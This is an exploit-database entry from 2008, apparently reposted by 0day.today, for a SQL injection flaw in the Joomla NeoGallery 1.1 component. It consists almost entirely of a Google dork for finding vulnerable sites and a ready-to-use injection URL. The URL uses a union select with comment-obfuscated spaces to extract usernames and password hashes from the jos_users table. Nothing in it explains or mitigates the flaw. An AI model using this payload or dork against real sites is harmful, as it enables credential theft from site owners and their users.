id: 2615
date: 02/08/2008
title: Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
author: S@BUN
cves: 

===========================================================
Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
===========================================================



#########################################################################
#
#  joomla SQL Injection(com_neogallery)
#
#
#########################################################################
#
# DORK 1 : allinurl:"com_neogallery"
#
##########################################################################
EXPLOIT :

index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users



#  0day.today [2023-03-21]  #